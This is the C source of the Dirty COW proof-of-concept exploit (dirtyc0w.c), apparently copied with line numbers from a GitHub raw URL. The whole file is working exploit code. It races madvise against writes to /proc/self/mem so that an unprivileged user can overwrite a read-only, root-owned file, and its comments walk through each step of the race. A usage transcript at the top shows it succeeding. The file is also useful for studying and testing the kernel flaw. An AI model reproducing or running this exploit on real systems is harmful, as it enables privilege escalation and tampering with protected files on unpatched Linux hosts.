https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

1. https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
2.  
3. /*
4. ####################### dirtyc0w.c #######################
5. $ sudo -s
6. # echo this is not a test > foo
7. # chmod 0404 foo
8. $ ls -lah foo
9. -r-----r-- 1 root root 19 Oct 20 15:23 foo
10. $ cat foo
11. this is not a test
12. $ gcc -lpthread dirtyc0w.c -o dirtyc0w
13. $ ./dirtyc0w foo m00000000000000000
14. mmap 56123000
15. madvise 0
16. procselfmem 1800000000
17. $ cat foo
18. m00000000000000000
19. ####################### dirtyc0w.c #######################
20. */
21. #include <stdio.h>
22. #include <sys/mman.h>
23. #include <fcntl.h>
24. #include <pthread.h>
25. #include <string.h>
26.  
27. void *map;
28. int f;
29. struct stat st;
30. char *name;
31.  
32. void *madviseThread(void *arg)
33. {
34. char *str;
35. str=(char*)arg;
36. int i,c=0;
37. for(i=0;i<100000000;i++)
38. {
39. /*
40. You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
41. > This is achieved by racing the madvise(MADV_DONTNEED) system call
42. > while having the page of the executable mmapped in memory.
43. */
44. c+=madvise(map,100,MADV_DONTNEED);
45. }
46. printf("madvise %d\n\n",c);
47. }
48.  
49. void *procselfmemThread(void *arg)
50. {
51. char *str;
52. str=(char*)arg;
53. /*
54. You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
55. > The in the wild exploit we are aware of doesn't work on Red Hat
56. > Enterprise Linux 5 and 6 out of the box because on one side of
57. > the race it writes to /proc/self/mem, but /proc/self/mem is not
58. > writable on Red Hat Enterprise Linux 5 and 6.
59. */
60. int f=open("/proc/self/mem",O_RDWR);
61. int i,c=0;
62. for(i=0;i<100000000;i++) {
63. /*
64. You have to reset the file pointer to the memory position.
65. */
66. lseek(f,map,SEEK_SET);
67. c+=write(f,str,strlen(str));
68. }
69. printf("procselfmem %d\n\n", c);
70. }
71.  
72.  
73. int main(int argc,char *argv[])
74. {
75. /*
76. You have to pass two arguments. File and Contents.
77. */
78. if (argc<3)return 1;
79. pthread_t pth1,pth2;
80. /*
81. You have to open the file in read only mode.
82. */
83. f=open(argv[1],O_RDONLY);
84. fstat(f,&st);
85. name=argv[1];
86. /*
87. You have to use MAP_PRIVATE for copy-on-write mapping.
88. > Create a private copy-on-write mapping. Updates to the
89. > mapping are not visible to other processes mapping the same
90. > file, and are not carried through to the underlying file. It
91. > is unspecified whether changes made to the file after the
92. > mmap() call are visible in the mapped region.
93. */
94. /*
95. You have to open with PROT_READ.
96. */
97. map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
98. printf("mmap %x\n\n",map);
99. /*
100. You have to do it on two threads.
101. */
102. pthread_create(&pth1,NULL,madviseThread,argv[1]);
103. pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
104. /*
105. You have to wait for the threads to finish.
106. */
107. pthread_join(pth1,NULL);
108. pthread_join(pth2,NULL);
109. return 0;
110. }